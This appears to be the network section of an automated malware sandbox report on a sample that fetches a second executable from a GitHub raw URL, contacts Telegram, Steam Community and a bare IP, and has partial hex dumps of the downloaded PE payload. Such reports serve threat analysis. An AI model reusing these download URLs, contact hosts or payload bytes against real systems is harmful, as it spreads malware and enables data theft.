                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.940293074 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.940371037 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.940404892 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.940448999 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.948554993 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.948645115 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.953949928 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.954015970 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.954029083 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.954071045 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.954108000 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.954128027 CET44349711104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.954145908 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.954176903 CET49711443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.986332893 CET49712443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.986393929 CET4434971237.27.43.98192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.986473083 CET49712443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.986756086 CET49712443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:52:22.986776114 CET4434971237.27.43.98192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:55.063421011 CET49712443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:52:55.085319042 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:55.085367918 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:55.085445881 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:55.085731030 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:55.085750103 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.447860956 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.447938919 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.448375940 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.448381901 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.450242043 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.450247049 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991590023 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991628885 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991657972 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991688013 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991702080 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991719007 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991730928 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991753101 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991976976 CET49714443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:52:56.991993904 CET44349714149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:57.014060974 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:57.014107943 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:57.014179945 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:57.014440060 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:57.014451981 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:58.394689083 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:58.394757032 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:58.395296097 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:58.395309925 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:58.397604942 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:58.397609949 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.242392063 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.242415905 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.242470980 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.242511988 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.242536068 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.242563963 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.242608070 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.354984999 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.355005026 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.355272055 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.355282068 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.355325937 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.362654924 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.362749100 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370177984 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370243073 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370271921 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370287895 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370318890 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370335102 CET44349715104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370351076 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.370378971 CET49715443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.393842936 CET49716443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.393906116 CET4434971637.27.43.98192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.393971920 CET49716443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.394258022 CET49716443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:52:59.394273043 CET4434971637.27.43.98192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:31.487765074 CET49716443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:53:31.506156921 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:31.506221056 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:31.506299019 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:31.506551981 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:31.506573915 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.870712996 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.870835066 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.871351004 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.871381998 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.880717039 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.880733013 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404787064 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404808044 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404865026 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404881001 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404880047 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404911041 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404948950 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.405258894 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.405276060 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419493914 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419506073 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419581890 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419795990 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419820070 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797450066 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797523022 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797957897 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797964096 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.799829006 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.799835920 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659035921 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659061909 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659077883 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659157991 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659178972 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659209967 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659234047 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768791914 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768815994 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768889904 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768904924 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768942118 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784017086 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784086943 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784106970 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784130096 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784146070 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784173965 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784531116 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784545898 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.808844090 CET49721443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.808885098 CET4434972137.27.43.98192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.808971882 CET49721443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.809313059 CET49721443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.809326887 CET4434972137.27.43.98192.168.2.8

                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.007039070 CET5917453192.168.2.81.1.1.1
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.144217968 CET53591741.1.1.1192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.651233912 CET5959753192.168.2.81.1.1.1
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.788146019 CET53595971.1.1.1192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.311718941 CET5029253192.168.2.81.1.1.1
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.448657036 CET53502921.1.1.1192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.433841944 CET5697653192.168.2.81.1.1.1
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.570995092 CET53569761.1.1.1192.168.2.8

                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.007039070 CET192.168.2.81.1.1.10xd59bStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.651233912 CET192.168.2.81.1.1.10x3ee9Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.311718941 CET192.168.2.81.1.1.10x3a71Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.433841944 CET192.168.2.81.1.1.10xef5fStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Dec 23, 2024 08:52:12.144217968 CET1.1.1.1192.168.2.80xd59bNo error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.788146019 CET1.1.1.1192.168.2.80x3ee9No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.788146019 CET1.1.1.1192.168.2.80x3ee9No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.788146019 CET1.1.1.1192.168.2.80x3ee9No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:14.788146019 CET1.1.1.1192.168.2.80x3ee9No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:18.448657036 CET1.1.1.1192.168.2.80x3a71No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 23, 2024 08:52:20.570995092 CET1.1.1.1192.168.2.80xef5fNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                        • github.com
                                                                                                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                                                                                                        • t.me
                                                                                                                                                                                                                        • steamcommunity.com

                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.2.84970820.233.83.1454434044C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:52:13 UTC114OUTGET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
                                                                                                                                                                                                                        Host: github.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-12-23 07:52:14 UTC565INHTTP/1.1 302 Found
                                                                                                                                                                                                                        Server: GitHub.com
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:14 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                        Location: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        2024-12-23 07:52:14 UTC3378INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.2.849709185.199.110.1334434044C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC125OUTGET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Length: 476160
                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                        ETag: "fab0c349a347a91ca7e8afd2bad974668e7a1ce50c0b2f5ed6f73ab561c31a75"
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        X-GitHub-Request-Id: 983A:E76FB:25E89C2:2ABA5DA:676916B0
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:16 GMT
                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                        X-Timer: S1734940336.276669,VS0,VE122
                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                        X-Fastly-Request-ID: f5f749722be5e3f6ae795b453236213167545510
                                                                                                                                                                                                                        Expires: Mon, 23 Dec 2024 07:57:16 GMT
                                                                                                                                                                                                                        Source-Age: 0
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 95 8b 4d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a8 04 00 00 98 02 00 00 00 00 00 93 e8 03 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 28 00 00 04 00 00 00 00 00 00 02 00 00 82 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 a8 05 00 f0 00 00
                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELMg@(H
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 b2 e8 6c 8e 01 f0 b9 52 f4 6c 8e 03 0d 74 eb 45 00 51 68 3d b5 66 00 ff d0 83 c4 08 a1 38 ec 45 00 01 f8 8b 0d 3c ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 b6 e8 6c 8e 01 f0 b9 8f f4 6c 8e 03 0d 74 eb 45 00 51 68 48 b5 66 00 ff d0 83 c4 08 a1 40 ec 45 00 01 f8 8b 0d 44 ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 ba e8 6c 8e 01 f0 b9 d0 f4 6c 8e 03 0d 74 eb 45 00 51 68 54 b5 66 00 ff d0 83 c4 08 a1 48 ec 45 00 01 f8 8b 0d 4c ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 be e8 6c 8e 01 f0 b9 08 f5 6c 8e 03 0d 74 eb 45 00 51 68 61 b5 66 00 ff d0 83 c4 08 a1 50 ec 45 00 01 f8 8b 0d 54 ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 c2 e8 6c 8e 01 f0 b9 41 f5 6c 8e 03 0d 74 eb 45 00 51 68 6c b5 66 00 ff d0
                                                                                                                                                                                                                        Data Ascii: RlpElRltEQh=f8E<ERlpElltEQhHf@EDERlpElltEQhTfHELERlpElltEQhafPETERlpElAltEQhlf
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 51 1b 88 50 04 0f b6 51 05 32 51 1c 88 50 05 0f b6 51 06 32 51 1d 88 50 06 0f b6 51 07 32 51 1e 88 50 07 0f b6 51 08 32 51 1f 88 50 08 0f b6 51 09 32 51 20 88 50 09 0f b6 51 0a 32 51 21 88 50 0a 0f b6 51 0b 32 51 22 88 50 0b 0f b6 51 0c 32 51 23 88 50 0c c6 05 06 b4 66 00 01 c3 cc cc cc 80 3d 10 b4 66 00 00 75 67 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 1e 88 10 0f b6 51 01 32 51 1f 88 50 01 0f b6 51 02 32 51 20 88 50 02 0f b6 51 03 32 51 21 88 50 03 0f b6 51 04 32 51 22 88 50 04 0f b6 51 05 32 51 23 88 50 05 0f b6 51 06 32 51 24 88 50 06 0f b6 51 07 32 51 25 88 50 07 0f b6 51 08 32 51 26 88 50 08 c6 05 10 b4 66 00 01 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d 1c b4 66 00 00 75 7b 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 1f 88 10 0f b6 51 01 32 51
                                                                                                                                                                                                                        Data Ascii: QPQ2QPQ2QPQ2QPQ2QPQ2Q PQ2Q!PQ2Q"PQ2Q#Pf=fugL$D$2QQ2QPQ2Q PQ2Q!PQ2Q"PQ2Q#PQ2Q$PQ2Q%PQ2Q&Pf=fu{L$D$2QQ2Q
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 08 8b 44 24 04 0f b6 11 32 51 1c 88 10 0f b6 51 01 32 51 1d 88 50 01 0f b6 51 02 32 51 1e 88 50 02 0f b6 51 03 32 51 1f 88 50 03 0f b6 51 04 32 51 20 88 50 04 0f b6 51 05 32 51 21 88 50 05 0f b6 51 06 32 51 22 88 50 06 0f b6 51 07 32 51 23 88 50 07 0f b6 51 08 32 51 24 88 50 08 0f b6 51 09 32 51 25 88 50 09 0f b6 51 0a 32 51 26 88 50 0a 0f b6 51 0b 32 51 27 88 50 0b 0f b6 51 0c 32 51 28 88 50 0c 0f b6 51 0d 32 51 29 88 50 0d 0f b6 51 0e 32 51 2a 88 50 0e 0f b6 51 0f 32 51 2b 88 50 0f 0f b6 51 10 32 51 2c 88 50 10 c6 05 25 ba 66 00 01 c3 cc cc cc cc cc cc cc cc cc cc cc 80 3d 2f ba 66 00 00 75 67 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 11 88 10 0f b6 51 01 32 51 12 88 50 01 0f b6 51 02 32 51 13 88 50 02 0f b6 51 03 32 51 14 88 50 03 0f b6 51 04 32 51 15 88
                                                                                                                                                                                                                        Data Ascii: D$2QQ2QPQ2QPQ2QPQ2Q PQ2Q!PQ2Q"PQ2Q#PQ2Q$PQ2Q%PQ2Q&PQ2Q'PQ2Q(PQ2Q)PQ2Q*PQ2Q+PQ2Q,P%f=/fugL$D$2QQ2QPQ2QPQ2QPQ2Q
